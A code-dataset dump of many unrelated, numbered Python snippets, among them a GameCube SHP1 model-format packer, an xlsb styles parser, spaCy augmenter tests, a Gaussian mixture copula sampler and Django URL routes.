UserName = getpass.getuser()
if UserName == 'cvdronke':
start_path = 'C:/Users/' + UserName + '/'
else:
start_path = 'D:/'
main() |
498331 | def my_dir(obj):
return dir(obj)
class SingleClassInModule(object):
def __init__(self, prop):
raise NotImplementedError()
def not_implemented(self, param):
raise NotImplementedError()
|
498333 | from .grammaregex import match_tree, find_tokens, print_tree, verify_pattern, PatternSyntaxException
|
498349 | import testinfra
def test_service_is_running_and_enabled(Service):
kibana = Service('kibana')
assert kibana.is_running
assert kibana.is_enabled
|
498371 | from setuptools import setup, find_packages, Command
import os
setup(
name="pythonparser",
version="1.4",
author="whitequark",
author_email="<EMAIL>",
url="https://github.com/m-labs/pythonparser",
description="A Python parser intended for use in tooling",
long_description=open("README.md").read(),
license="MIT",
install_requires=["regex"],
extras_require={},
dependency_links=[],
packages=find_packages(exclude=["tests*"]),
namespace_packages=[],
test_suite="pythonparser.test",
package_data={},
ext_modules=[],
entry_points={},
)
|
498384 | import sys
from pathlib import Path
def set_api(key):
token_file = Path(__file__).parent.absolute() / "key"
token_file.write_text(key)
print("The API-token " + key + " was entered and saved.")
|
498397 | import dnaweaver as dw
import time
cheap_dna_offer = dw.CommercialDnaOffer(
name="CheapDNA.",
sequence_constraints=[
dw.NoPatternConstraint(enzyme="BsaI"),
dw.SequenceLengthConstraint(max_length=4000),
],
pricing=dw.PerBasepairPricing(0.10),
)
oligo_dna_offer = dw.CommercialDnaOffer(
name="OliGoo",
sequence_constraints=[
dw.GcContentConstraint(min_gc=0.3, max_gc=0.7),
dw.SequenceLengthConstraint(max_length=100),
],
pricing=dw.PerBasepairPricing(0.07),
memoize=True,
)
oligo_assembly_station = dw.DnaAssemblyStation(
name="Oligo Assembly Station",
assembly_method=dw.OligoAssemblyMethod(
overhang_selector=dw.TmSegmentSelector(
min_size=15, max_size=25, min_tm=50, max_tm=70
),
min_segment_length=40,
max_segment_length=200,
sequence_constraints=[dw.SequenceLengthConstraint(max_length=1500)],
duration=8,
cost=30,
),
supplier=oligo_dna_offer,
coarse_grain=20,
a_star_factor="auto",
memoize=True,
)
assembly_station = dw.DnaAssemblyStation(
name="Gibson Assembly Station",
assembly_method=dw.GibsonAssemblyMethod(
overhang_selector=dw.TmSegmentSelector(min_tm=55, max_tm=70),
min_segment_length=500,
max_segment_length=4000,
),
supplier=[cheap_dna_offer, oligo_assembly_station],
logger="bar",
coarse_grain=100,
fine_grain=10,
a_star_factor="auto",
)
print("Looking for the best assembly plan...")
t0 = time.time()
sequence = dw.random_dna_sequence(10000, seed=123)
quote = assembly_station.get_quote(sequence, with_assembly_plan=True)
print(quote.assembly_step_summary())
print("Finished in %.01d seconds" % (time.time() - t0))
|
498440 | import sys
import pandas as pd
import numpy as np
def add_info(df):
k = df.columns
ks = [len(i) for i in k]
ks = max(ks)
focus = k[2]
focus_value = df[focus]
best_focus_value = max(focus_value)
best_row = df[df[focus] == best_focus_value]
n = len(df[k[0]])
idx = list(range(1,n+1)) + ['*'] + ['best'] +['ave'] + ['std']
best = {i:list(best_row[i])[0] for i in k}
ave = {i:np.mean(df[i]) for i in k}
std = df.std()
std = {i:std[i] for i in k}
sep = {i:'-'*(ks-1) for i in k}
df = df.append([sep])
df = df.append([best])
df = df.append([ave])
df = df.append([std])
df.index = idx
return df
print('type focus_0: [val/test/dev/step]')
f0 = sys.stdin.readline().strip()
print('file dir')
file_dir = sys.stdin.readline().strip()
file_dir += '/job.log.0'
with open(file_dir, 'r') as f:
logs = []
for l in f:
logs.append(l.strip())
mem = []
if f0 == 'val':
f0s = 'dev'
else:
f0s = f0[:]
for l in logs:
if l.startswith('batch_size:'):
mem.append({'{0}'.format(f0):[], 'test':[]})
elif l.startswith('[{0} evaluation] '.format(f0s)):
mem[-1]['{0}'.format(f0)].append(float(l.split('] ')[1].split(', ')[0].split(': ')[1]))
elif l.startswith('[test evaluation] '):
mem[-1]['test'].append(float(l.split('] ')[1].split(', ')[0].split(': ')[1]))
lib = {'loc':[], 'best_test_auc':[], 'best_{0}_auc'.format(f0):[]}
for rep in mem:
#for rec in range(len(rep['test'])):
full_test_times = len(rep['test'])
best_loc = np.argmax(rep['{0}'.format(f0)])
best_foucs = rep['{0}'.format(f0)][best_loc]
best_test = rep['test'][best_loc]
#lib['loc'].append('{0}/{1}'.format(best_loc, len(rep['test'])))
lib['loc'].append(best_loc)
lib['best_test_auc'].append(best_test)
lib['best_{0}_auc'.format(f0)].append(best_foucs)
lib = pd.DataFrame(lib)
lib = add_info(lib)
k = list(lib['loc'])
full_rep_times = len(mem)
for i in range(len(k)):
if i < full_rep_times or i in (full_rep_times+1, full_rep_times+2):
k[i] = '{0}/{1}'.format(k[i], full_test_times-1)
lib['loc'] = k
print(lib)
|
498462 | import numpy
from btypes.big_endian import *
import gx
import logging
logger = logging.getLogger(__name__)
class Header(Struct):
magic = ByteString(4)
section_size = uint32
shape_count = uint16
__padding__ = Padding(2)
shape_offset = uint32
index_offset = uint32
unknown0_offset = uint32
attribute_descriptor_offset = uint32
matrix_index_offset = uint32
packet_offset = uint32
matrix_selection_offset = uint32
packet_location_offset = uint32
def __init__(self):
self.magic = b'SHP1'
@classmethod
def unpack(cls, stream):
header = super().unpack(stream)
if header.magic != b'SHP1':
raise FormatError(f'invalid magic: {header.magic}')
if header.unknown0_offset != 0:
logger.warning('unexpected unknown0_offset value: %s', header.unknown0_offset)
return header
class AttributeDescriptor(Struct):
"""Arguments to GXSetVtxDesc."""
attribute = EnumConverter(uint32, gx.Attribute)
input_type = EnumConverter(uint32, gx.InputType)
def __init__(self, attribute, input_type):
self.attribute = attribute
self.input_type = input_type
class AttributeDescriptorList(TerminatedList):
element_type = AttributeDescriptor
terminator_value = element_type(gx.VA_NULL, gx.NONE)
@staticmethod
def terminator_predicate(element):
return element.attribute == gx.VA_NULL
class MatrixSelection(Struct):
unknown0 = uint16 # position/normal matrix for texture matrices? noclip.website: use matrix index
count = uint16
first = uint32
class PacketLocation(Struct):
size = uint32
offset = uint32
class Primitive:
def __init__(self, primitive_type, vertices):
self.primitive_type = primitive_type
self.vertices = vertices
class Batch:
def __init__(self, primitives, matrix_table, unknown0):
self.primitives = primitives
self.matrix_table = matrix_table
self.unknown0 = unknown0
class Shape(Struct):
transformation_type = uint8
__padding__ = Padding(1)
batch_count = uint16
attribute_descriptor_offset = uint16
first_matrix_selection = uint16
first_packet = uint16
__padding__ = Padding(2)
bounding_radius = float32
min_x = float32
min_y = float32
min_z = float32
max_x = float32
max_y = float32
max_z = float32
def __init__(self):
self.transformation_type = 0
@classmethod
def pack(cls, stream, shape):
shape.batch_count = len(shape.batches)
super().pack(stream, shape)
def get_attribute_type(attribute_descriptor):
if attribute_descriptor.input_type == gx.INDEX8:
return numpy.uint8
if attribute_descriptor.input_type == gx.INDEX16:
return numpy.uint16
if attribute_descriptor.input_type == gx.DIRECT:
if attribute_descriptor.attribute == gx.VA_PTNMTXIDX:
return numpy.uint8
if attribute_descriptor.attribute in gx.VA_TEXMTXIDX:
return numpy.uint8
raise ValueError(f'invalid direct attribute: {attribute_descriptor.attribute}')
raise ValueError(f'invalid input type: {attribute_descriptor.input_type}')
def get_vertex_type(attribute_descriptors):
return numpy.dtype([
(descriptor.attribute.name, get_attribute_type(descriptor))
for descriptor in attribute_descriptors
]).newbyteorder('>')
def pack_packet(stream, primitives):
for primitive in primitives:
uint8.pack(stream, primitive.primitive_type)
uint16.pack(stream, len(primitive.vertices))
primitive.vertices.tofile(stream)
align(stream, 0x20, b'\x00')
def unpack_packet(stream, vertex_type, size):
# The entire packet is read into memory at once to improve performance
packet = stream.read(size)
primitives = []
i = 0
while i < size:
opcode = packet[i]
if opcode == 0x00:
i += 1
continue
primitive_type = gx.PrimitiveType(opcode)
vertex_count = uint16.unpack_from(packet, i + 1)
vertices = numpy.frombuffer(packet, vertex_type, vertex_count, i + 3)
primitives.append(Primitive(primitive_type, vertices))
i += 3 + vertex_count*vertex_type.itemsize
return primitives
class Haystack:
def __init__(self):
self.keys = []
self.values = []
def __getitem__(self, key):
try:
index = self.keys.index(key)
except ValueError:
raise KeyError(key)
return self.values[index]
def __setitem__(self, key, value):
try:
index = self.keys.index(key)
except ValueError:
self.keys.append(key)
self.values.append(value)
else:
self.values[index] = value
def __contains__(self, key):
return key in self.keys
def pack(stream, shapes):
base = stream.tell()
header = Header()
header.shape_count = len(shapes)
stream.write(b'\x00'*Header.sizeof())
header.shape_offset = stream.tell() - base
stream.write(b'\x00'*Shape.sizeof()*len(shapes))
header.index_offset = stream.tell() - base
for index in range(len(shapes)):
uint16.pack(stream, index)
align(stream, 4)
header.unknown0_offset = 0
align(stream, 0x20)
header.attribute_descriptor_offset = stream.tell() - base
deduplicate_table = Haystack()
for shape in shapes:
if shape.attribute_descriptors not in deduplicate_table:
offset = stream.tell() - base - header.attribute_descriptor_offset
deduplicate_table[shape.attribute_descriptors] = offset
AttributeDescriptorList.pack(stream, shape.attribute_descriptors)
shape.attribute_descriptor_offset = deduplicate_table[shape.attribute_descriptors]
matrix_indices = []
matrix_selections = []
for shape in shapes:
shape.first_matrix_selection = len(matrix_selections)
for batch in shape.batches:
matrix_selection = MatrixSelection()
matrix_selection.unknown0 = batch.unknown0
matrix_selection.first = len(matrix_indices)
matrix_selection.count = len(batch.matrix_table)
matrix_indices.extend(batch.matrix_table)
matrix_selections.append(matrix_selection)
header.matrix_index_offset = stream.tell() - base
for matrix_index in matrix_indices:
uint16.pack(stream, matrix_index)
align(stream, 0x20)
header.packet_offset = stream.tell() - base
packet_locations = []
for shape in shapes:
shape.first_packet_location = len(packet_locations)
for batch in shape.batches:
offset = stream.tell()
pack_packet(stream, batch.primitives)
packet_location = PacketLocation()
packet_location.offset = offset - header.packet_offset - base
packet_location.size = stream.tell() - offset
packet_locations.append(packet_location)
header.matrix_selection_offset = stream.tell() - base
for matrix_selection in matrix_selections:
MatrixSelection.pack(stream, matrix_selection)
header.packet_location_offset = stream.tell() - base
for packet_location in packet_locations:
PacketLocation.pack(stream, packet_location)
align(stream, 0x20)
header.section_size = stream.tell() - base
stream.seek(base)
Header.pack(stream, header)
stream.seek(base + header.shape_offset)
for shape in shapes:
Shape.pack(stream, shape)
stream.seek(base + header.section_size)
def unpack(stream):
base = stream.tell()
header = Header.unpack(stream)
stream.seek(base + header.shape_offset)
shapes = [Shape.unpack(stream) for _ in range(header.shape_count)]
stream.seek(base + header.index_offset)
for index in range(header.shape_count):
if index != uint16.unpack(stream):
raise FormatError('invalid index')
duplicate_table = {}
for shape in shapes:
offset = base + header.attribute_descriptor_offset + shape.attribute_descriptor_offset
if offset not in duplicate_table:
stream.seek(offset)
attribute_descriptors = AttributeDescriptorList.unpack(stream)
duplicate_table[offset] = attribute_descriptors
shape.attribute_descriptors = duplicate_table[offset]
stream.seek(base + header.matrix_selection_offset)
count = max(shape.first_matrix_selection + shape.batch_count for shape in shapes)
matrix_selections = [MatrixSelection.unpack(stream) for _ in range(count)]
stream.seek(base + header.matrix_index_offset)
count = max(selection.first + selection.count for selection in matrix_selections)
matrix_indices = [uint16.unpack(stream) for _ in range(count)]
stream.seek(base + header.packet_location_offset)
count = max(shape.first_packet + shape.batch_count for shape in shapes)
packet_locations = [PacketLocation.unpack(stream) for _ in range(count)]
for shape in shapes:
vertex_type = get_vertex_type(shape.attribute_descriptors)
shape.batches = [None]*shape.batch_count
for i in range(shape.batch_count):
matrix_selection = matrix_selections[shape.first_matrix_selection + i]
matrix_table = matrix_indices[matrix_selection.first : matrix_selection.first + matrix_selection.count]
packet_location = packet_locations[shape.first_packet + i]
stream.seek(base + header.packet_offset + packet_location.offset)
primitives = unpack_packet(stream, vertex_type, packet_location.size)
shape.batches[i] = Batch(primitives, matrix_table, matrix_selection.unknown0)
stream.seek(base + header.section_size)
return shapes
|
498484 | import os
from . import recordtypes as rt
from .recordreader import RecordReader
from .records import FormatRecord
class Format(object):
__slots__ = ('code', 'is_builtin', '_is_date_format')
def __init__(self, code):
self.code = code
self.is_builtin = False
self._is_date_format = None
@property
def is_date_format(self):
if self._is_date_format is None:
self._is_date_format = False
if self.code is not None:
# TODO Implement an actual parser
in_color = 0
for c in self.code:
if c == '[':
in_color += 1
elif c == ']' and in_color > 0:
in_color -= 1
elif in_color > 0:
continue
elif c in ('y', 'm', 'd', 'h', 's'):
self._is_date_format = True
break
return self._is_date_format
def __repr__(self):
return 'Format(code={}, is_builtin={})' \
.format(self.code, self.is_builtin)
class BuiltinFormat(Format):
__slots__ = ()
def __init__(self, *args, **kwargs):
super(BuiltinFormat, self).__init__(*args, **kwargs)
self.is_builtin = True
class Styles(object):
_general_format = BuiltinFormat(None)
# See: ISO/IEC29500-1:2016 section 18.8.30
_builtin_formats = {
1: BuiltinFormat('0'),
2: BuiltinFormat('0.00'),
3: BuiltinFormat('#,##0'),
4: BuiltinFormat('#,##0.00'),
9: BuiltinFormat('0%'),
10: BuiltinFormat('0.00%'),
11: BuiltinFormat('0.00E+00'),
12: BuiltinFormat('# ?/?'),
13: BuiltinFormat('# ??/??'),
14: BuiltinFormat('mm-dd-yy'),
15: BuiltinFormat('d-mmm-yy'),
16: BuiltinFormat('d-mmm'),
17: BuiltinFormat('mmm-yy'),
18: BuiltinFormat('h:mm AM/PM'),
19: BuiltinFormat('h:mm:ss AM/PM'),
20: BuiltinFormat('h:mm'),
21: BuiltinFormat('h:mm:ss'),
22: BuiltinFormat('m/d/yy h:mm'),
37: BuiltinFormat('#,##0;(#,##0)'),
38: BuiltinFormat('#,##0;[Red](#,##0)'),
39: BuiltinFormat('#,##0.00;(#,##0.00)'),
40: BuiltinFormat('#,##0.00;[Red](#,##0.00)'),
45: BuiltinFormat('mm:ss'),
46: BuiltinFormat('[h]:mm:ss'),
47: BuiltinFormat('mmss.0'),
48: BuiltinFormat('##0.0E+0'),
49: BuiltinFormat('@')
}
def __init__(self, fp):
self._fp = fp
self._parse()
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.close()
def _parse(self):
self._formats = dict()
self._cell_style_xfs = list()
self._cell_xfs = list()
self._fp.seek(0, os.SEEK_SET)
reader = RecordReader(self._fp)
for rectype, rec in reader:
if rectype == rt.FMT:
self._formats[rec.fmtId] = Format(rec.fmtCode)
elif rectype == rt.BEGIN_CELL_STYLE_XFS:
self._cell_style_xfs = [None] * rec.count
i = 0
for rectype, rec in reader:
if rectype == rt.XF:
self._cell_style_xfs[i] = rec
i += 1
elif rectype == rt.END_CELL_STYLE_XFS:
break
elif rectype == rt.BEGIN_CELL_XFS:
self._cell_xfs = [None] * rec.count
i = 0
for rectype, rec in reader:
if rectype == rt.XF:
self._cell_xfs[i] = rec
i += 1
elif rectype == rt.END_CELL_XFS:
break
elif rectype == rt.END_STYLE_SHEET:
break
def get_style(self, idx):
# TODO
del idx
def _get_format(self, idx):
if idx < len(self._cell_xfs):
fmt_id = self._cell_xfs[idx].numFmtId
if fmt_id in self._formats:
return self._formats[fmt_id]
elif fmt_id in self._builtin_formats:
return self._builtin_formats[fmt_id]
return self._general_format
def close(self):
self._fp.close()
|
498543 | import json
import os
import random
from torch.utils.data import Dataset
from PIL import Image
from PIL import ImageFile
ImageFile.LOAD_TRUNCATED_IMAGES = True
Image.MAX_IMAGE_PIXELS = None
from data.utils import pre_caption
import os,glob
class pretrain_dataset(Dataset):
def __init__(self, ann_file, laion_path, transform):
self.ann_pretrain = []
for f in ann_file:
print('loading '+f)
ann = json.load(open(f,'r'))
self.ann_pretrain += ann
self.laion_path = laion_path
if self.laion_path:
self.laion_files = glob.glob(os.path.join(laion_path,'*.json'))
print('loading '+self.laion_files[0])
with open(self.laion_files[0],'r') as f:
self.ann_laion = json.load(f)
self.annotation = self.ann_pretrain + self.ann_laion
else:
self.annotation = self.ann_pretrain
self.transform = transform
def reload_laion(self, epoch):
n = epoch%len(self.laion_files)
print('loading '+self.laion_files[n])
with open(self.laion_files[n],'r') as f:
self.ann_laion = json.load(f)
self.annotation = self.ann_pretrain + self.ann_laion
def __len__(self):
return len(self.annotation)
def __getitem__(self, index):
ann = self.annotation[index]
image = Image.open(ann['image']).convert('RGB')
image = self.transform(image)
caption = pre_caption(ann['caption'],30)
return image, caption |
498547 | class AmazonEvalF(object):
PROD_ID = 'prod_id'
CAT = 'cat'
REV1 = 'rev1'
REV2 = 'rev2'
REV3 = 'rev3'
REV4 = 'rev4'
REV5 = 'rev5'
REV6 = 'rev6'
REV7 = 'rev7'
REV8 = 'rev8'
SUMM1 = 'summ1'
SUMM2 = 'summ2'
SUMM3 = 'summ3'
REVS = [REV1, REV2, REV3, REV4, REV5, REV6, REV7, REV8]
|
498566 | import re
"""
Load all cleaned text files from wikipedia and convert them to clean
line by line sentences text.
"""
# based histogram of an output, 50 time step for LSTM would be good!
#input location of text files
input_file = 'data/raw.en/englishText_'
# output location
output_file = 'data/wiki_sentences'
# refere to first file in input location
start_file_index = 0
# step size in the name of text file
step = 10000
# Token to replace all integers inside the text
dig_token = "$DGT$"
# pattern to find the digit numbers
dig_pattern = r'\b[0-9]*\.*[0-9]+\b'
# loop over all text 154 files
for i in range(0, 154):
# hold text to write to new file
data = ""
# concatenate file name with step size
input_filename = input_file + str(start_file_index) + '_' + str(start_file_index + step)
# output filename
output_filename = output_file + str(i) + '.txt'
# increase start_file_index for next loop
start_file_index += step
print("reading: " + input_filename)
with open(input_filename, mode="r", encoding="latin-1") as f:
# lines here are paragraphs in Wikipedia
for line in f:
line = " ".join(line.split())
words = line.split(' ')
# if this paragraph is shorter than 10 words, go to next paragraph
if len(words) < 10:
continue
# remove <doc id... produced by WikiExtractor
if words[0] == '<doc':
continue
# divide paragraph to sentences
pattern = '(\w\w..\.\ )'
indexes = re.finditer(pattern, line)
line = list(line)
for j in indexes:
m = j.span()
line[m[1]-1] = '\n'
line = ''.join(line)
# replace digits with $DGT$
line = re.sub(dig_pattern, dig_token, line)
data += line + '\n'
out_file = open(output_filename, mode="w")
out_file.write(data)
out_file.close()
|
498568 | import pytest
from httpx import AsyncClient
from main import app
from dotenv import load_dotenv
from services.helpers.alena import cleaning_service
from pathlib import Path
import os
import sys
load_dotenv()
headers = {
'Authorization': 'Bearer {}'.format(os.environ.get('FILE_MANAGER_BEARER_TOKEN'))
}
_ORIGINAL_IMAGE = open('api/app/static/pictures/original/dcb8ac79618540688ea36e688a8c3635.png', 'rb')
_ORIGINAL_IMAGE_NAME = 'dcb8ac79618540688ea36e688a8c3635.png'
@pytest.mark.asyncio
async def test_root():
params = {'cpu_load': 'True'}
async with AsyncClient(app=app, base_url=os.environ.get('API_URL'), headers=headers, params=params) as ac:
response = await ac.get("/")
if params.get('cpu_load') != 'True':
assert response.json() == {"Hello": "Token is True"}
assert response.status_code == 200
@pytest.mark.asyncio
async def test_upload_image_file():
params = {'thumbnail': 'True'}
image_file = {'file': (_ORIGINAL_IMAGE_NAME, _ORIGINAL_IMAGE, 'image/png')}
async with AsyncClient(app=app, base_url=os.environ.get('API_URL'), headers=headers, params=params) as ac:
response = await ac.post("/image", files=image_file)
assert response.status_code == 200
imagePaths = {
'original' : response.json().get('thumbnail').split('/')[len(response.json().get('thumbnail').split('/')) - 1].split('.')[0] + '.png',
'thumbnail' : response.json().get('thumbnail').split('/')[len(response.json().get('thumbnail').split('/')) - 1]
}
assert Path(os.environ.get('IMAGE_THUMBNAIL_LOCAL_PATH') + '/' +imagePaths['thumbnail']).is_file() == True
cleaning_service(imagePaths, images = True) |
498592 | import json
import os
# Change the "report_elements" array in the config.json file
# input is an array, for exemple : ["facebook", "twitter"]
def modules_update(self, modules):
new_config = self.CONFIG
new_config["report_elements"] = modules
try:
with open(self.CONFIG["config_path"], 'w') as fp:
json.dump(new_config, fp, indent=4)
except Exception as e:
print(e)
# Remove modules that do not exist
def get_report_modules(self):
return list( set(self.CONFIG["report_elements"]) & set(list(self.CONFIG["plateform"].keys())) ) |
498605 | from django.conf.urls import url, include
from nimbus.apps import debug_urls
from . import views
urlpatterns = debug_urls()
urlpatterns += [
url(r"^$", views.api_root, name="api_root"),
url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework')),
url(r'^api-token-auth$', 'rest_framework.authtoken.views.obtain_auth_token'),
url(r"^media/list$", views.MediaList.as_view(), name="media_list"),
url(r"^media/show$", views.MediaDetail.as_view(), name="media_detail"),
url(r"^media/add_file$", views.AddFile.as_view(), name="add_file"),
url(r"^media/add_link$", views.AddLink.as_view(), name="add_link"),
url(r"^media/delete$", views.delete_media, name="delete_media"),
]
|
498643 | from dacy.augmenters import (
create_char_swap_augmenter,
create_spacing_augmenter,
create_char_random_augmenter,
create_char_replace_augmenter,
)
from spacy.lang.da import Danish
from spacy.training import Example
def test_create_char_swap_augmenter():
aug = create_char_swap_augmenter(doc_level=1, char_level=1)
nlp = Danish()
doc = nlp("qw")
example = Example(doc, doc)
examples = aug(nlp, example)
example_aug = next(examples)
assert example_aug.x.text == "wq"
def test_create_spacing_augmenter():
aug = create_spacing_augmenter(doc_level=1, spacing_level=1)
nlp = Danish()
doc = nlp("en sætning.")
example = Example(doc, doc)
examples = aug(nlp, example)
example_aug = next(examples)
assert example_aug.x.text == "ensætning."
def test_create_char_random_augmenter():
aug = create_char_random_augmenter(doc_level=1, char_level=1)
nlp = Danish()
doc = nlp("en sætning.")
example = Example(doc, doc)
examples = aug(nlp, example)
example_aug = next(examples)
assert example_aug.x.text != "en sætning."
def test_create_char_replace_augmenter():
aug = create_char_replace_augmenter(
doc_level=1, char_level=1, replacement={"q": ["a", "b"]}
)
nlp = Danish()
doc = nlp("q w")
example = Example(doc, doc)
examples = aug(nlp, example)
example_aug = next(examples)
assert example_aug.x[0].text in ["a", "b"]
assert example_aug.x[1].text == "w"
|
498647 | import numpy as np
from numpy.random import choice
from scipy.stats import multivariate_normal as mvn
from .marginals import gmm_marginal_cdf
from .parameter import GMCParam
__all__ = ['random_gmcm']
def random_gmcm(n: int, param: GMCParam):
"""
Generates random variables from a Gaussian Mixture Copula Model
Parameters
----------
n : int
The number of instances to generate
param : GMCParam
The Gaussian Mixture Copula parameter
Returns
-------
np.ndarray
An array of random variables
"""
z = random_gmm(n, param) # latent realizations from Gaussian mixture model
return gmm_marginal_cdf(z, param)
def random_gmm(n: int, param: GMCParam):
"""Generates random variables from a Gaussian Mixture Model"""
output = np.empty((n, param.n_dim))
order = choice(range(param.n_clusters), n, p=param.prob)
for i in range(param.n_clusters):
k = sum(order == i)
output[order == i] = mvn.rvs(param.means[i], cov=param.covs[i], size=k)
return output
|
498665 | import re
import numpy as np
from tool.runners.python import SubmissionPy
class SilvestreSubmission(SubmissionPy):
def parse(self, s):
# "#1400 @ 873,28: 11x27"
rec = re.compile(r"^#(\d+) @ (\d+),(\d+): (\d+)x(\d+)$")
rectangles = [rec.match(row) for row in s.splitlines()]
rectangles = [tuple(map(int, m.groups())) for m in rectangles]
return rectangles
def run(self, s):
# :param s: input in string format
# :return: solution flag
# Your code goes here
rectangles = self.parse(s) # list of (id, x, y, width, height)
array = np.zeros((1000, 1000), dtype=np.uint)
for (_, x, y, width, height) in rectangles:
array[x:x+width, y:y+height] += 1
return np.sum(array >= 2)
|
498831 | from unittest import TestCase
from app.templating.summary.answer import Answer
class TestAnswer(TestCase):
def test_create_answer(self):
# Given
answer_schema = {'id': 'answer-id', 'label': 'Answer Label', 'type': 'date'}
user_answer = 'An answer'
# When
answer = Answer(answer_schema, user_answer, 2)
# Then
self.assertEqual(answer.id, 'answer-id-2')
self.assertEqual(answer.label, 'Answer Label')
self.assertEqual(answer.value, user_answer)
def test_date_answer_type(self):
# Given
answer_schema = {'id': 'answer-id', 'label': '', 'type': 'date'}
user_answer = None
# When
answer = Answer(answer_schema, user_answer, 0)
# Then
self.assertEqual(answer.type, 'date')
|